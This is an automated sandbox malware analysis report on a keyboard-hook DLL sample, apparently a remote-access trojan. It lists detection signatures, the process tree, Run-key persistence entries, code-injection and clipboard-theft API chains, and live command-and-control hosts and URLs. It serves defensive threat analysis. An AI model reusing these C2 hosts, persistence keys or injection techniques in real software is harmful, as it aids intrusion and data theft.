Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hkeyboard.dll

Overview

General Information

Sample name:Hkeyboard.dll
Analysis ID:1578296
MD5:74180139ac5989392ea788036116a937
SHA1:703f9052ef90dd93ee0b4e84dd48c131b423208b
SHA256:6fd79201ed86080b03d8bd1ea1b8251eef8c86b242cf1406b6cad9d84b9cd0d9
Tags:de-pumpeddllexeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Creates an autostart registry key pointing to binary in C:\Windows
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Sigma detected: Dllhost.EXE Execution Anomaly
Tries to access browser extension known for cryptocurrency wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3428 cmdline: loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6872 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2536 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5632 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)
      • dllhost.exe (PID: 7220 cmdline: dllhost.exe MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
    • rundll32.exe (PID: 7184 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7276 cmdline: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7352 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7360 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7368 cmdline: rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 7300 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 7568 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: dllhost.exe, CommandLine: dllhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\dllhost.exe, NewProcessName: C:\Windows\SysWOW64\dllhost.exe, OriginalFileName: C:\Windows\SysWOW64\dllhost.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5632, ParentProcessName: rundll32.exe, ProcessCommandLine: dllhost.exe, ProcessId: 7220, ProcessName: dllhost.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\SysWOW64\rundll32.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\proxifer.update
Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 103.252.117.185, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\dllhost.exe, Initiated: true, ProcessId: 7220, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49742
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\SysWOW64\rundll32.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5632, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rolyer.update
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-19T14:48:19.112652+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP
2024-12-19T14:49:04.243762+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP
2024-12-19T14:49:49.156685+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP
2024-12-19T14:50:34.179212+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP
2024-12-19T14:51:19.204984+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP
2024-12-19T14:52:04.301629+010020491511A Network Trojan was detected81.31.208.368081192.168.2.649736TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01E506 CertOpenStore,GetLastError,CryptStringToBinaryA,CertCloseStore,CertFindCertificateInStore,CertCloseStore,__fread_nolock,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,CertFreeCertificateContext,CertCloseStore,_strncpy,CertFreeCertificateContext,3_2_6D01E506
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D045D40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,3_2_6D045D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D048900 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_6D048900
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D044970 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,3_2_6D044970
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0449C0 CryptHashData,3_2_6D0449C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0449E0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_6D0449E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D03F9F0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,3_2_6D03F9F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01C8D0 BCryptGenRandom,3_2_6D01C8D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D03F520 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,3_2_6D03F520
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01D4B0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_6D01D4B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01C750 BCryptGenRandom,3_2_6D01C750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01C690 BCryptGenRandom,3_2_6D01C690
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D047130 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_6D047130
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D047190 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_6D047190
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0470F0 CryptAcquireContextA,CryptCreateHash,3_2_6D0470F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: -----BEGIN PUBLIC KEY-----3_2_6D003340
Source: rundll32.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\SysWOW64\rundll32.exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_6D02C120
Source: Hkeyboard.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: Hkeyboard.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\source\repos\sn-15\Release\sn-15.pdb source: rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0668DA FindFirstFileExW,3_2_6D0668DA

Networking

barindex
Source: Network trafficSuricata IDS: 2049151 - Severity 1 - ET MALWARE Win32/Unknown RAT CnC Server Acknowledgement : 81.31.208.36:8081 -> 192.168.2.6:49736
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.40.214 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 81.31.208.36 8081Jump to behavior
Source: global trafficTCP traffic: 192.168.2.6:49736 -> 81.31.208.36:8081
Source: global trafficHTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: */*
Source: global trafficHTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: */*
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: PERMANETASIE PERMANETASIE
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownTCP traffic detected without corresponding DNS query: 81.31.208.36
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC79E0 select,_memset,recv,setsockopt,CancelIo,InterlockedExchange,closesocket,setsockopt,CancelIo,InterlockedExchange,closesocket,SetEvent,3_2_04EC79E0
Source: global trafficHTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: */*
Source: global trafficHTTP traffic detected: GET /yj/update.xml HTTP/1.1Host: www.dj5a2sbj.icuAccept: */*
Source: global trafficDNS traffic detected: DNS query: www.dj5a2sbj.icu
Source: global trafficDNS traffic detected: DNS query: api.mods4ws.me
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllString found in binary or memory: https://curl.se/docs/hsts.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: rundll32.exe, rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2239587139.000000000302A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllString found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xml
Source: rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllString found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosX
Source: rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dll
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.40.214:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC60A0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_04EC60A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC6B00 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_04EC6B00
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A67F0 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_032A67F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04176B00 GetTickCount,_memset,CloseHandle,_memset,wsprintfA,ShellExecuteA,ShellExecuteA,Sleep,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_04176B00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC60A0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_04EC60A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D045D40 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,3_2_6D045D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC5930 ExitWindowsEx,3_2_04EC5930
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A5620 ExitWindowsEx,8_2_032A5620
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04175930 ExitWindowsEx,11_2_04175930
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB34F03_2_04EB34F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EBA5DE3_2_04EBA5DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ED8D563_2_04ED8D56
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EDF6593_2_04EDF659
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EBFE3F3_2_04EBFE3F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC1E0E3_2_04EC1E0E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC0FBD3_2_04EC0FBD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC08E13_2_04EC08E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ED29983_2_04ED2998
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EDF1083_2_04EDF108
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EE02863_2_04EE0286
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EE12173_2_04EE1217
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EDFBAA3_2_04EDFBAA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC03903_2_04EC0390
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC6B003_2_04EC6B00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CFFBFE03_2_6CFFBFE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01E5063_2_6D01E506
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0187103_2_6D018710
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D041D003_2_6D041D00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D017D103_2_6D017D10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D006D303_2_6D006D30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D03FC003_2_6D03FC00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D06AC463_2_6D06AC46
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D031CB03_2_6D031CB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D037CC03_2_6D037CC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0488B03_2_6D0488B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D013BC03_2_6D013BC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D04AAC03_2_6D04AAC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D02FAF03_2_6D02FAF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01B5903_2_6D01B590
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D05D7A63_2_6D05D7A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0527B73_2_6D0527B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0547F03_2_6D0547F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01D6403_2_6D01D640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0686883_2_6D068688
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0281003_2_6D028100
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D04915C3_2_6D04915C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D02A1B03_2_6D02A1B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D04F0E13_2_6D04F0E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0203603_2_6D020360
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0422603_2_6D042260
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0482803_2_6D048280
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_0329FB508_2_0329FB50
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_0329979E8_2_0329979E
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032933E08_2_032933E0
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A67F08_2_032A67F0
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A05F28_2_032A05F2
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A1C5F8_2_032A1C5F
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A00A18_2_032A00A1
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032A0CCE8_2_032A0CCE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_041634F011_2_041634F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04188D5611_2_04188D56
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0416A5DE11_2_0416A5DE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04171E0E11_2_04171E0E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0416FE3F11_2_0416FE3F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0418F65911_2_0418F659
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04170FBD11_2_04170FBD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_041708E111_2_041708E1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0418F10811_2_0418F108
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0418299811_2_04182998
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0419121711_2_04191217
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0419028611_2_04190286
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04176B0011_2_04176B00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0417039011_2_04170390
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0418FBAA11_2_0418FBAA
Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 03295A00 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04184FB8 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04EB5CE0 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04ED4FB8 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D049D00 appears 65 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D018DE0 appears 59 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D043550 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D00E490 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D00A450 appears 290 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D00A380 appears 389 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D00DDB0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04165CE0 appears 41 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D00DE10 appears 51 times
Source: Hkeyboard.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal100.spyw.evad.winDLL@23/1@2/4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC34F0 CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,lstrcmpiA,Process32Next,CloseHandle,3_2_04EC34F0
Source: C:\Windows\SysWOW64\dllhost.exeMutant created: \Sessions\1\BaseNamedObjects\MaticYoyox
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\xYYAgXEhxx
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
Source: Hkeyboard.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Hkeyboard.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZ
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@Z
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\dllhost.exe dllhost.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZ
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZ
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@Z
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZ
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?InstallKBHook@@YAHXZJump to behavior
